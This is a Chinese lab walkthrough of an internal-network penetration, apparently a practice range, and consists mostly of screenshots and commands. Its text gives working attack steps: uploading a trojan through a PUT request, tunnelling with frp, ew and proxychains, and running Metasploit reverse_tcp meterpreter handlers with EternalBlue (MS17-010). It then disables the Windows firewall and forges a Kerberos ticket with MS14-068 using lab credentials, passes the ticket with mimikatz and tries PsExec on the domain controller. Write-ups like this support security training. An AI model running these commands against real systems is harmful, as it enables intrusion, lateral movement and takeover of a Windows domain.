信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-9fcd3600f51a2c2e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3a674b35f179b062.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-253a8264bf2646d8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-86b984dff5deba4d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2001端口
![](https://upload-images.jianshu.io/upload_images/4664072-31d649f0590e3bbf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3dbc0a32964cdc6e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-9ea4dbbe4a4488d0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-899644627ea4e9c5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2002端口
![](https://upload-images.jianshu.io/upload_images/4664072-e4f0cfeff9808f29.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
抓包修改为PUT请求,上传木马,前面加/
![](https://upload-images.jianshu.io/upload_images/4664072-165ab40f95f004fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-60dca0d8dddbab9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-398cf80d345ad3c4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c 'import pty; pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-a6aa2a93e9195230.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d7414eda1225c489.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
添加代理
个人原因 重置
kali IP地址改为 192.168.1.128
centos IP地址为192.168.1.130
修改客户端
![](https://upload-images.jianshu.io/upload_images/4664072-fe16fd4416ad5dc7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
服务端
![](https://upload-images.jianshu.io/upload_images/4664072-fd6ad65b30c4d325.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
./frpc -c./frpc.ini
./frps-c./frps.ini
![](https://upload-images.jianshu.io/upload_images/4664072-c535b8a1ea1cbb8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-dd24f206f25b86fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或者ew代理
chmod 777 ew_for_linux64
./ew_for_linux64 -s ssocksd -l 1080
proxychains代理
vi /etc/proxychains.conf
![](https://upload-images.jianshu.io/upload_images/4664072-36483afbc7c4b767.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
proxychains msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.1.128
set lport 4440
run
route add 192.168.183.0 255.255.255.0 2
route print
![](https://upload-images.jianshu.io/upload_images/4664072-c46a8693a37377b7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
主机探测
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.183.1/24
set threads 10
run
![](https://upload-images.jianshu.io/upload_images/4664072-d839cf906de7d80f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.183.128-132
rhosts => 192.168.183.128-132
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
![](https://upload-images.jianshu.io/upload_images/4664072-89882c50218177e5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.129
msf5 exploit(windows/smb/ms17_010_eternalblue) >set lhost 192.168.1.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
![](https://upload-images.jianshu.io/upload_images/4664072-5d09bd5ab495dd9f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
set payload windows/x64/shell/bind_tcp
![](https://upload-images.jianshu.io/upload_images/4664072-2088aa8529f67628.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-16c75f8c95e498e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
只得到了shell
65001 UTF-8代码页 解决乱码
chcp 65001
![](https://upload-images.jianshu.io/upload_images/4664072-97ba9a4d8e24e81c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
netsh firewall set opmode disable 关闭防火墙
![](https://upload-images.jianshu.io/upload_images/4664072-6bb40897bac3035c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ipconfig
![](https://upload-images.jianshu.io/upload_images/4664072-76a05d1d8a6b96fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看域内机器
net view /domain.demo
![](https://upload-images.jianshu.io/upload_images/4664072-ad8af9a4b0bb38e5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-930ad154ed1ddde2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看桌面
![](https://upload-images.jianshu.io/upload_images/4664072-2c114c3a8ce0e04f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
ms14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
![](https://upload-images.jianshu.io/upload_images/4664072-ab2246d1e1ce8b14.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
kerberos::purge
![](https://upload-images.jianshu.io/upload_images/4664072-23144ef8d0418ca3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
kerberos::list
kerberos::ptc TGT_douser@demo.com.ccache
![](https://upload-images.jianshu.io/upload_images/4664072-39019d44fa00e1e0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
获取域控文件
dir \WIN-ENS2VR5TR3Nc$
![](https://upload-images.jianshu.io/upload_images/4664072-f7801d13f6cc9d63.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用PSTools目录下的PsExec.exe获取shell 失败
PsExec64.exe \WIN-ENS2VR5TR3N cmd.exe
![](https://upload-images.jianshu.io/upload_images/4664072-fd83e751d2366dd9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
参考文章
https://www.cnblogs.com/yuzly/p/10859520.html
https://blog.51cto.com/loveemily/2163147
https://blog.csdn.net/deng_xj/article/details/88952420
https://www.cnblogs.com/PANDA-Mosen/p/13118210.html